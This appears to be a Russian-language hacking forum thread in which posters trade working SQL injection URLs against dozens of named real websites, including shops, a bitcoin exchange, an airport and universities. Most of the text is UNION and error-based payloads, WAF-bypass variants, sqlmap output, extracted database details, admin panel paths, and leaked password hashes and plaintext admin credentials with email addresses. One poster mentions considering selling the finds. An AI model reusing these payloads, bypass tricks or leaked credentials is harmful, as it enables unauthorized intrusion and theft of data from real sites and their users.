SQL Инъекции

Хэш очень похож на OpenBSD Blowfish
Логин подозреваю будет Admin
Вот что удалось вытянуть,подозреваю уже кто-то залез в админку
[email protected]:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO!
[email protected]:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCWFk4u9wVBkqC!
Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/

Code:

http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Ну и бонусВот интерестная inject. дальше не получатся залезть,если есть идеи в ПМ пож.

 

btc

Code:

Post[URL]: http://www.vitalcoin.com/order_ajax_request.php
Post[data]: Action=IsUserLogedIn&TransactionMode=2&TransactionType=PKR and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

Code:

<b>Warning</b>:  mysql_query(): Unable to save result set in <b>/home/vitalcoi/public_html/models/order.php</b> on line <b>88</b><br />
Duplicate entry '~'vitalcoi_dbuser@localhost'~1' for key 'group_key'

Code:

Админка под Basic
UserID,UserName,Password=16^kitharass^56c87d0571ee5a4da6793583164da8f4:[email protected]
UserID,UserName,Password=14^admin^Vital!@#:[email protected]
UserID,UserName,Password=15^maria^55913d077666fa9d9b5a0a35c718ba38

 

Code:

www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-
www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-
toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,'<br>',password),222+from+jos_users--%20-

 

Code:

 http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5-- 

5.0.96-log
[email protected]
casuni

Powered By: Friends IT Solution (дырявые все)
Пробую их самих разобрать.

 

The NORTH FACE

Code:

http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27

Версия: 5.5.42-37.1

 

www.nowinstock.net трафф 580к

Code:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))
---
web application technology: Apache
back-end DBMS: MySQL 5.1
База sdfs4f_main

 

Code:

http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--
http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,database(),19,20,21,22,23,24,25,26,27,28--
http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--
Вывод в title

 

papersource.com трафф 430к

Code:

Parameter: #1* (URI)

    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html

back-end DBMS: MySQL >= 5.0.0
databases:
paper

 

Code:

http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,12+from+users+--+

Code:

http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+FrOm+admin+--+

Админка

Code:

http://www.yarohranatruda.ru/admin/

Code:

http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+

Админка

Code:

http://russkayabronza.com/adm.php

 

Code:

http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--

использовал вкупе с sqlmap
[*] information_schema
[*] KoreaMed
[*] test

Адовое количество таблиц, возиться не стал.

Code:

http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

режет mod_secure

Code:

http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Проблема с кодировкой, неверно выводит и просто вывести version() нельзя. Нужно воспользоваться фукцией convert()
convert(version()+using+latin1)
в итоге есть:

4.1.14::soundman@localhost::RiddimDB

 

Code:

http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+

 

Аэропорт, вроде не самый маленький в этих ваших Европах. Присутствует фильтр обходится внедрением в любую часть %0B, например union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables и далее по аналогии.

Тиц == 110, PR == 6, Alexa == 120,422

Code:

http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(concat_ws(0x3a,version(),user()))))))='1

Онлайн бронь на авиабилеты и все что с этим связано. Вывод в сорсе

Тиц == 10, PR == 0, Alexa == 390,710

Code:

http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,version(),database(),user())--

 

общего трафика много вроде , 2,7kk, субдомен pmi.org

Code:

http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,database(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+limit+0,1--

[email protected]: pmiprof
5.0.96-log

игры для консолей

Code:

https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry '[email protected]' for key 'group_key'
5.1.69-community-log

WAF

Code:

http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27  limit 0,1

Вот обоход

Code:

http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28%29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns  where TABLE_schema=database%28%29 limit 0,1

[email protected]:db472536571
5.1.73-log

Code:

http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 -- 

5.0.90-log

 

Code:

http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14--+

 

Code:

https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+

 

Была разминка, думал что сойдет для продажи но мелочи думаю... может кому полезно будет или трафферам.

Code:

ttp://torrent.tlt.ru/browse.php?cat=5
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Nginx
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] tracker

Code:

mega-torrent.ru/browse.php?cat=18
Warning: mysql_fetch_array() expects parameter 1 to be resource

Code:

http://www.guildvalhall.eu/inc-news.php?id=8429
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] valhall

Инфы много.)

 

Code:

http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+

 

Зарубежный сайт знакомств

Code:

http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Сайт анонимных знакомств и раврата...

Code:

https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

 

Вывод в заголовке, или в сорсе

Code:

http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 

5.5.42-cll

Спортивное снаряжение Twins
Вывод в заголовке, или в сорсе

Code:

http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,version(),26,27,28,29 or ''='

twinsspe_twins@localhost
5.5.36-cll
twinsspe_twins

Шоп

Code:

http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))

plummo@localhost
5.1.73
plummo_shop

Code:

http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30  --

staff_user@lnv-101
4.0.21-Max
staff

Code:

http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),database())))*/,4,5,6,7,8,9,10,11,12,13 -- 

ghashamo_user@localhost
5.5.42-37.1
ghashamo_db

Шоп

Code:

http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+--+and '1'='1

mcbooks_dbuser@localhost
5.5.42-37.1
mcbooks_mainsite

 

Code:

http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+from+information_schema.tables+--+

5.5.44-0+deb7u1-log